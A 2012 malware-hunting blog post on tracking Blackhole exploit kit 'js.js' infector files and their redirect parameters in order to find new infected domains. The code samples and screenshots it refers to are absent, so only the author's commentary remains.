Understanding Recent Blackhole Exploit Kit's "js.js" Infector Trend for Smart Hunting
01 Sep 2012
When I hunt honeypot blackhole exploit kit (BHEK) blacklist
for infections I often come to see some URLs ending up with js.js on it.
The file will be the same in extention but actually it has differences in
contents depend on malware epidemic exploitation / how the BHEK want to
infect users at that time.
Previously, the trend I found in the js.js code was a mere and
common injected obfuscation script like :
↑It was obvious that we must crack this code for getting to the next -
hop of the malware source.
another text file contains "document.location=" of a certain blackhole sites.
The moral of this writing is, we can nail bigger stuffs / new epidemic by
understanding the parameter produced by the recent terms.
Allow me to demonstrate this theory. Let's see the below real infected urls:
This will connect you to the certain "document.location=" below:
The lesson teach us to understand the curent trend of parameter used in
blackhole, which is :
Let's proof this theory by searching the above strings in the -
malware domain list site:
↑*) Click to enlarge the pic
↑Voila! We got ourself a new hunting field. :-)
PS: This posts is dedicated to fellow malware hunters